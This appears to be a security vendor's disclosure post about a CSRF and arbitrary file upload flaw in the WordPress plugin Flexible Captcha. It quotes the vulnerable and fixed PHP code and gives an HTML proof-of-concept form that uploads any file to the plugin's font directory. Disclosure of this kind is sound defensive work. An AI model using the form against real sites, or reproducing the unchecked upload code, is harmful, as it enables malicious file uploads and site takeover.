12 Feb

Our Proactive Monitoring Caught a Cross-site Request Forgery (CSRF)/Arbitrary File Upload Vulnerability in Flexible Captcha

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. That sometimes leads to us catching a vulnerability of a more limited variant of one of those serious vulnerability types, which isn’t as much concern for the average website, but could be utilized in a targeted attack. That happened with the cross-site request forgery (CSRF)/arbitrary file upload vulnerability we found in the plugin Flexible Captcha. This vulnerability could have allowed an attacker that could get a logged in Administrator to visit a URL the attacker controls, to upload a malicious file to the website, which the hacker could then use to take additional actions on their own with the website.

Since the check used to spot this is also included in our Plugin Security Checker (which  is now accessible through a WordPress plugin of its own), it is another of reminder of how that can help to indicate which plugins are in greater need of security review (for which we do as part of our service as well as separately).

The vulnerability involves the function handle_font_upload(), located in the file /lib/FlexibleCaptcha.class.php, which previously would save any type of file sent with a request to the directory /wp-content/uploads/fc-fonts/:

214
215
function handle_font_upload() {
	if (!file_exists($this->;fontDirectory . $_FILES['FC_font_upload']['name']) &&; move_uploaded_file( $_FILES['FC_font_upload']['tmp_name'], $this->fontDirectory . $_FILES['FC_font_upload']['name'] )) {

Since it is only intended to handle font uploads there should have been a limit on what types of files could be uploaded.

The threat of that would largely depend on who could access that. That function is called in the function settings_page() if a POST input “submit_font_file” exists:

205
206
207
function settings_page() {
	if (array_key_exists('submit_font_file', $_POST)) {
		$this->handle_font_upload();

That function in turn is called when accessing the plugin’s settings page in the admin area of WordPress:

150
$plugin_page=add_submenu_page('options-general.php', 'Flexible Captcha Settings', 'Flexible Captcha', 'activate_plugins', 'Flexible_Captcha', array($this, 'settings_page'));

That page is only accessible by those logged in to WordPress that have the “activate_plugins” capability, which would normally be Administrators. Administrators normally have the ability to upload any type of file they want, so there being able to do that through this plugin isn’t a vulnerability on its own. The vulnerability here comes from a lack of a check for a valid nonce when processing the upload, which means an attacker could cause an Administrator to send a request to upload a file without them intending it.

Several hours after we contacted the developer they released version 3.4, which fixes this by adding a nonce check and doing a couple of checks on what type of file is being uploaded:

214
215
216
217
function handle_font_upload() {
	if (wp_verify_nonce(sanitize_text_field($_POST['FC_nonce']), plugin_basename(__FILE__))) {
		$fontMime = array('application/x-font-ttf', 'application/vnd.ms-opentype');
		if (preg_match("/(.otf|.ttf)$/", $_FILES['FC_font_upload']['name']) && in_array(mime_content_type($_FILES['FC_font_upload']['tmp_name']), $fontMime) && !file_exists($this->fontDirectory . $_FILES['FC_font_upload']['name']) && move_uploaded_file( $_FILES['FC_font_upload']['tmp_name'], $this->fontDirectory . $_FILES['FC_font_upload']['name'] )) {

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/fc-fonts/, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=Flexible_Captcha" method="POST" enctype="multipart/form-data">
<input type="file" name="FC_font_upload" />
<input type="submit" name="submit_font_file" value="Submit" />
</form>
</body>
</html>

Timeline

  • February 9, 2018 – Developer notified.
  • February 9, 2018 – Version 3.4 released, which fixes vulnerability.
  • February 9, 2018 – Developer responds.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *